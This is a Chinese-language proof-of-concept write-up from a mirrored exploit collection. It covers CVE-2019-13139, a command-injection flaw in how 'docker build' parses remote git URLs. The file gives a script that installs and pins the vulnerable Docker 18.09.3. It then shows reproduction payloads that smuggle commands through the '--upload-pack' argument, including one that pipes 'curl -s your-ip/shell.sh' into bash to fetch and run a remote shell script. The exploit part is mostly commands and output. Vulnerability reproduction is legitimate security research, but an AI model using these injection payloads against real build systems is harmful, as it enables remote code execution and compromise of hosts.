admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/云安全漏洞/Docker build 漏洞导致命令执行 CVE-2019-13139.md
Threekiii 98dd292f01 update CVE-2019-13139
2025-04-21 17:36:11 +08:00

95 lines
2.8 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Docker build 漏洞导致命令执行 CVE-2019-13139
## 漏洞描述
使用 `docker build` 命令构建本地镜像时,支持使用远程 url 参数作为构建环境,并且这个远程构建环境可以是一个 git 仓库。
在 Docker 18.9.4 之前版本中,`docker build` 过程中对 `remoteUrl` 解析存在缺陷,导致了 `remoteUrl` 中的部分字符串会被作为命令执行。
参考链接:
- https://nvd.nist.gov/vuln/detail/CVE-2019-13139
- https://staaldraad.github.io/post/2019-07-16-cve-2019-13139-docker-build/
- https://github.com/Metarget/metarget
## 漏洞影响
```
Docker < 18.9.4
```
## 环境搭建
ubuntu 18.04 使用以下脚本 `install_docker_18.09.03.sh` 安装 Docker 18.9.3
```
#!/bin/bash
set -e
echo "[*] Removing old Docker versions (if any)..."
sudo apt remove -y docker docker-engine docker.io containerd runc || true
echo "[*] Removing incorrect Docker sources..."
sudo rm -f /etc/apt/sources.list.d/docker.list || true
sudo sed -i '/download.docker.com/d' /etc/apt/sources.list
echo "[*] Adding Tsinghua University Docker mirror GPG key..."
wget -qO - https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu/gpg | sudo apt-key add -
echo "[*] Adding Tsinghua University Docker mirror repository..."
echo "deb [arch=amd64] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu bionic stable" \
| sudo tee /etc/apt/sources.list.d/docker.list
echo "[*] Updating package index..."
sudo apt update
echo "[*] Searching for Docker 18.09.3..."
VERSION_STRING=$(apt-cache madison docker-ce | grep 18.09.3 | head -n1 | awk '{print $3}')
if [ -z "$VERSION_STRING" ]; then
echo "[*] Docker 18.09.3 not found"
exit 1
fi
echo "[*] Found version: $VERSION_STRING"
echo "[*] Installing Docker version $VERSION_STRING ..."
sudo apt install -y docker-ce=$VERSION_STRING docker-ce-cli=$VERSION_STRING containerd.io
echo "[*] Locking version to prevent automatic updates..."
sudo apt-mark hold docker-ce docker-ce-cli containerd.io
echo "[*] Installation complete, current version:"
docker --version
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090739097.png)
## 漏洞复现
执行相关利用命令,执行结果报错但不影响:
```
docker build "git@g.com/a/b#--upload-pack=touch 13139.txt;:"
```
查看命令是否执行成功:
```
ls | grep 13139
------
13139.txt
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090836057.png)
下载远程 shell 文件并执行:
```
# port must be 80
docker build "git@github.com/a/b#--upload-pack=curl -s your-ip/shell.sh|bash;#:"
```
![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421092642068.png)
## 漏洞修复
- 升级至最新版本 https://docs.docker.com/engine/release-notes/
Reference in New Issue View Git Blame Copy Permalink